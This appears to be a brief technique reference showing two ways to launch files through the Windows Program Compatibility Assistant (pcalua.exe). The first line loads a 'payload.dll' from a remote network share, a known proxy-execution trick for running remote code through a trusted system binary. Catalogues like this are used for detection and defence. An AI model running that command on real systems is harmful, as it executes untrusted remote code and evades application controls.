pcalua.exe -a \\server\payload.dll
Open the target .DLL file with the Program Compatibilty Assistant.

pcalua.exe -a C:\Windows\system32\javacpl.cpl -c Java
Open the target .CPL file with the Program Compatibility Assistant.
